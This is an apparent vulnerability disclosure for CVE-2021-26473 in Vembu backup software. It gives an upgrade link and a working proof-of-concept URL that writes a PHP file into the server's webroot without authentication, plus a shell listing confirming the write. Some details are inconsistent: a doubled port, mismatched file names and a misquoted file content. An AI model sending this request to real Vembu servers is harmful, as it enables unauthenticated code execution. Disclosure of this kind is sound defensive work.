CVE-2021-26473 - Unauthenticated fileupload
Advisory
Upgrade to the latest version of Vembu; https://www.vembu.com/downloads
Technical details
Trigger the unauthenticated fileupload by requesting the following url:
http://192.168.46.5:6060:6060/sgwebservice_o.php?Action=logFilePath&path=./filewireteexploit.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A
This will write a file called filewireteexploit.php with the content <?php>phpinfo();<?php> into the webroot of the Vembu webserver:
root@5a1a9ca3e0e9:/home/vembubdr/Vembu/VembuBDR/htmlgui# ls -lah filewriteexploit.php
-rw-r--r-- 1 www-data www-data 18 Jan 30 20:20 filewriteexploit.php
root@5a1a9ca3e0e9:/home/vembubdr/Vembu/VembuBDR/htmlgui#